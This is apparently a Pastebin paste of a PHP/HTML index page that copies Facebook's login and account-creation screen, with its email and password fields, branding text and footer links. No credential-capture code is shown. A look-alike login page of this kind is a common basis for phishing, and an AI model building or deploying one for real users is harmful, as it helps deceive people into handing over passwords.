Advertisement
jundelcaroz

index.php

Aug 21st, 2019
444
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.56 KB | None | 0 0
  1. <?php
  2. session_start();
  3. ?>
  4.  
  5. <html>
  6. <head>
  7. <title>Facebook Log In or Sign Up</title>
  8. <link href="css/style.css" type="text/css" rel="stylesheet"/>
  9. </head>
  10. <body>
  11.  
  12. <div id="header_wrapper">
  13. <div id="header">
  14. <li id="sitename"><a href="">facebook</a></li>
  15. <form action="#" method="post">
  16. <li>Email or Phone<br><input type="text" name="email"></li>
  17. <li>Password<br><input type="password" name="password"><br><a href="">Forgotten account?</a></li>
  18. <li><input type="submit" id= "login" name="login" value="Log In"></li>
  19. </form>
  20. </div>
  21. </div>
  22.  
  23. <div id="wrapper">
  24.  
  25. <div id="div1">
  26. <span style="color:rgb(14, 56, 95); font-size:20px; font-weight:700; width:300px; word-spacing:-1;display:block; position:relative; left:-7px; margin:2%; ">Facebook helps you connect and share with the people in your life.</span>
  27. <img src="images/map.png">
  28. </div>
  29.  
  30. <div id="div2">
  31. <h1>Create an account</h1>
  32. <p>It's free and always will be.</p>
  33. <li><input type="text" placeholder="First Name" id="firstname"><input type="text" placeholder="Surname" id="surname"></li>
  34. <li><input type="text" placeholder="Mobile number or email address"></li>
  35. <li><input type="text" placeholder="Re-enter mobile number or email address"></li>
  36. <li><input type="password" placeholder="New password"></li>
  37. <p>Birthday</p>
  38. <li>
  39. <select><option>Day</option>
  40. <option>01</option>
  41. <option>02</option>
  42. <option>03</option>
  43. <option>04</option>
  44. <option>05</option>
  45. <option>06</option>
  46. <option>07</option>
  47. <option>08</option>
  48. <option>09</option>
  49. <option>10</option>
  50. <option>11</option>
  51. <option>12</option>
  52. <option>13</option>
  53. <option>14</option>
  54. <option>15</option>
  55. <option>16</option>
  56. <option>17</option>
  57. <option>18</option>
  58. <option>19</option>
  59. <option>20</option>
  60. <option>21</option>
  61. <option>22</option>
  62. <option>23</option>
  63. <option>24</option>
  64. <option>25</option>
  65. <option>26</option>
  66. <option>27</option>
  67. <option>28</option>
  68. <option>29</option>
  69. <option>30</option>
  70. <option>31</option>
  71. </select>
  72. <select>
  73. <option>Month</option>
  74. <option>01</option>
  75. <option>02</option>
  76. <option>03</option>
  77. <option>04</option>
  78. <option>05</option>
  79. <option>06</option>
  80. <option>07</option>
  81. <option>08</option>
  82. <option>09</option>
  83. <option>10</option>
  84. <option>11</option>
  85. <option>12</option></select>
  86. <select><option>Year</option>
  87. </select>
  88. <a href="">Why do I need to provide my date of birth?</a>
  89. </li>
  90. <li><input type="radio" name='gender'>Female <input type="radio" name='gender'>Male</li>
  91. <li id="terms">By clicking Create an account, you agree to our <a href="">Terms</a> and that <br>you have read our <a href="">Data Policy</a>, including our <a href="">Cookie Use</a>.</li>
  92. <li><input type="submit" value="Create an account"></li>
  93. <li id="create_page"><a href="">Create a Page</a> for a celebrity, band or business.</li>
  94. </div>
  95. </div>
  96.  
  97. <div id="footer_wrapper">
  98.  
  99. <div id="footer1">
  100. English (UK) <a href="">हिन्दी</a>
  101. </div>
  102. <div id="footer2">
  103. <a href="">Sign Up</a><a href="">Log In</a><a href="">Messenger</a><a href="">Find Friends</a><a href="">Badges</a><a href="">People</a><a href="">Pages</a><a href="">Places</a><a href="">Games</a><a href="">Locations</a><a href="">Celebrities</a><a href="">Groups</a><a href="">Moments</a><a href="">About</a><a href="">Create Page</a><a href="">Developers</a><a href="">Careers</a><a href="">Privacy</a><a href="">Cookies</a><a href="">Ads</a><a href="">Terms</a><a href="">Help</a>
  104. </div>
  105.  
  106. </div>
  107. </body>
  108. <script src="js/login.js"></script>
  109.  
  110. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement